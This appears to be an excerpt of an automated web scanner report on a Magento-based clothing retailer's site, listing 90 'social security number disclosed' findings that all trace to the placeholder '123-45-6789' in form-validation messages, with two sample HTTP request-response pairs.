/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]...
/** * Magento * * NOTICE OF LICENSE * * This source file is subject to the Academic Free License (AFL 3.0) * that is bundled with this package in the file LICENSE_AFL.txt. * It is also availabl ...[SNIP]...
9. Social security numbers disclosedpreviousnext There are 90 instances of this issue:
Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Careers ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Securit ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Terms & ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Accesso ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men's A ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Arcade ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Bags - ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men's B ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Fred Per ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Fred Per ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Custome ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Deliver ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Late De ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Frequen ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Customs ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Order T ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Returns ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> footwea ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men's F ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Women's ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Heritag ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
The following social security number was disclosed in the response:
123-45-6789
Request
GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1 Host: www.fredperry.com Proxy-Connection: keep-alive Referer: http://fredperry.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/ Date: Tue, 09 Nov 2010 15:45:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Cache-Control: must-revalidate Last-modified: Thu, 20 May 2010 11:06:23 +0000 Expires: Wed, 09 Nov 2011 15:45:19 +0000 Content-Type: text/javascript Content-Length: 399652
/* Prototype JavaScript framework, version 1.6.0.3 * (c) 2005-2008 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototype we ...[SNIP]... something_1, block5, id-4', function (v) { return Validation.get('IsEmpty').test(v) || /^[A-Z][A-Z0-9_\/-]*$/i.test(v) }], ['validate-ssn', 'Please enter a valid social security number. For example 123-45-6789.', function(v) { return Validation.get('IsEmpty').test(v) || /^\d{3}-?\d{2}-?\d{4}$/.test(v); }], ['validate-zip', 'Please enter a valid zip code. For example 90602 or 90602-1234.', function(v) {
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Kidswea ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> My Firs ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Limited ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Men's L ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Stussy ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> British ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
The following social security number was disclosed in the response:
123-45-6789
Request
GET /limited-edition/men/collaboration-raf-simons-centenary-outfit/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:09:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=7g1qu2sogdcde90e6i6ef81lg3; expires=Tue, 09-Nov-2010 17:09:21 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29369
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Liberty ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> New Sty ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... . For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.", ...[SNIP]...
